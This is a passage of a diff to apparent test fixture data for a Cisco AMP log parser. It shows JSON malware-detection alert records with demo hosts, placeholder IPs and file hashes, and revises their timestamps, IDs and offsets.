"related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5532,7 +1944,7 @@ ] }, { - "@timestamp": "2021-01-15T10:10:51.000Z", + "@timestamp": "2021-01-15T10:18:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -5543,8 +1955,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667055705522187", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669147354595368", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -5553,14 +1965,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 565000000, + "cisco.amp.timestamp_nanoseconds": 375000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533667055705522000, + "event.id": 6533669147354595000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -5576,7 +1988,7 @@ "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 301500, + "log.offset": 50051, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -5599,64 +2011,56 @@ ] }, { - "@timestamp": "2021-01-15T10:10:11.000Z", + "@timestamp": "2021-01-15T10:18:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "b2:4b:d5:c2:a6:9f" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "ZBot:FakeAlert-tpd", - "cisco.amp.detection_id": "5832268410590855181", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669147354595367", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Unknown", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "b2:4b:d5:c2:a6:9f" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 13000000, + "cisco.amp.timestamp_nanoseconds": 360000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5832268414885822000, + "event.id": 6533669147354595000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e74f1b3fffc4ae61e077bbdec3230e95", - "file.hash.sha1": "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5", - "file.hash.sha256": "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "file.name": "2_3756858138.exe", - "file.path": "\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Zbot", - "host.name": "Demo_Zbot", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 302825, - "process.hash.md5": "9a2e18cb348feb772d02fb8f8728ab82", - "process.hash.sha1": "5df10f3387f7ff512e420240f81bde68a2b4c7aa", - "process.hash.sha256": "0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f", - "process.name": "a.exe", - "process.pid": 3020, + "log.offset": 51377, "related.hash": [ - "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "e74f1b3fffc4ae61e077bbdec3230e95", - "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Zbot" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5672,64 +2076,56 @@ ] }, { - "@timestamp": "2021-01-15T10:10:10.000Z", + "@timestamp": "2021-01-15T10:18:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "b2:4b:d5:c2:a6:9f" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "ZBot:FakeAlert-tpd", - "cisco.amp.detection_id": "5832268410590855180", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669143059628070", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Unknown", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "b2:4b:d5:c2:a6:9f" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 810000000, + "cisco.amp.timestamp_nanoseconds": 968000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5832268410590855000, + "event.id": 6533669143059628000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e74f1b3fffc4ae61e077bbdec3230e95", - "file.hash.sha1": "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5", - "file.hash.sha256": "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "file.name": "2_3756858138.exe", - "file.path": "\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Zbot", - "host.name": "Demo_Zbot", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 304431, - "process.hash.md5": "9a2e18cb348feb772d02fb8f8728ab82", - "process.hash.sha1": "5df10f3387f7ff512e420240f81bde68a2b4c7aa", - "process.hash.sha256": "0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f", - "process.name": "a.exe", - "process.pid": 3020, + "log.offset": 52696, "related.hash": [ - "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "e74f1b3fffc4ae61e077bbdec3230e95", - "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Zbot" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5745,7 +2141,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:53.000Z", + "@timestamp": "2021-01-15T10:18:25.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -5757,7 +2153,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257087266357305", + "cisco.amp.detection_id": "6176259286289612895", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -5766,14 +2162,14 @@ "cisco.amp.related.mac": [ "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 942000000, + "cisco.amp.timestamp_nanoseconds": 669000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257087266357000, + "event.id": 6176259286289613000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -5786,7 +2182,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 307596, + "log.offset": 54015, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", @@ -5806,129 +2202,60 @@ ] }, { - "@timestamp": "2021-01-15T10:09:51.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666798007484426", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 469000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533666798007484000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 308915, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:09:50.000Z", + "@timestamp": "2021-01-15T10:18:13.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "23:d5:92:eb:f8:9b" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666793712517128", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259234750005342", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" + "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 948000000, + "cisco.amp.timestamp_nanoseconds": 657000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666793712517000, + "event.id": 6176259234750005000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 311551, + "log.offset": 55334, "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Dyre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5936,72 +2263,60 @@ ] }, { - "@timestamp": "2021-01-15T10:09:48.000Z", + "@timestamp": "2021-01-15T10:18:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "23:d5:92:eb:f8:9b" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666785122582535", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259183210397789", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" + "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 372000000, + "cisco.amp.timestamp_nanoseconds": 645000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666785122583000, + "event.id": 6176259183210398000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 312869, - "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", - "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "process.name": "rundll32.exe", - "process.pid": 596, + "log.offset": 56653, "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Dyre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6009,60 +2324,72 @@ ] }, { - "@timestamp": "2021-01-15T10:09:42.000Z", + "@timestamp": "2021-01-15T10:17:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257040021717048", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6180335966167760897", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "e1:e5:94:ea:a5:44" ], - "cisco.amp.timestamp_nanoseconds": 304000000, + "cisco.amp.timestamp_nanoseconds": 875000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257040021717000, + "event.id": 6180335966167761000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b2e15a06b0cca8a926c94f8a8eae3d88", + "file.hash.sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5", + "file.hash.sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "file.name": "Fax.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 314451, + "log.offset": 57972, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "b2e15a06b0cca8a926c94f8a8eae3d88", + "f9b02ad8d25157eebdb284631ff646316dc606d5" ], "related.hosts": [ - "Demo_Dyre" + "Demo_Upatre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6070,60 +2397,66 @@ ] }, { - "@timestamp": "2021-01-15T10:09:30.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176256988482109495", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590309", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 292000000, + "cisco.amp.timestamp_nanoseconds": 672000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176256988482109000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 315770, + "log.offset": 59570, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6131,7 +2464,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:29.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6142,8 +2475,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666703518203910", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590308", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -6152,14 +2485,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 782000000, + "cisco.amp.timestamp_nanoseconds": 653000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666703518204000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -6173,7 +2506,7 @@ "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 317089, + "log.offset": 60896, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -6196,7 +2529,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:27.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6207,25 +2540,24 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666694928269316", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590307", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 80000000, + "cisco.amp.timestamp_nanoseconds": 260000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666694928269000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -6233,20 +2565,13 @@ "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 319725, - "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", - "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "process.name": "rundll32.exe", - "process.pid": 2204, + "log.offset": 62215, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -6269,7 +2594,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:24.000Z", + "@timestamp": "2021-01-15T10:17:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6281,7 +2606,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176256962712305718", + "cisco.amp.detection_id": "6176259135965757532", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -6290,14 +2615,14 @@ "cisco.amp.related.mac": [ "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 286000000, + "cisco.amp.timestamp_nanoseconds": 8000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176256962712306000, + "event.id": 6176259135965757000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -6310,7 +2635,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 321307, + "log.offset": 63534, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", @@ -6330,72 +2655,55 @@ ] }, { - "@timestamp": "2021-01-15T10:09:07.000Z", + "@timestamp": "2021-01-15T10:17:41.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617250006073346", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, "cisco.amp.file.disposition": "Malicious", "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "90:61:b5:c9:13:79" ], - "cisco.amp.timestamp_nanoseconds": 296000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 291000000, + "event.action": "Executed malware", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617250006073000, + "event.id": 1489955900291000600, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", - "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", - "file.hash.sha256": 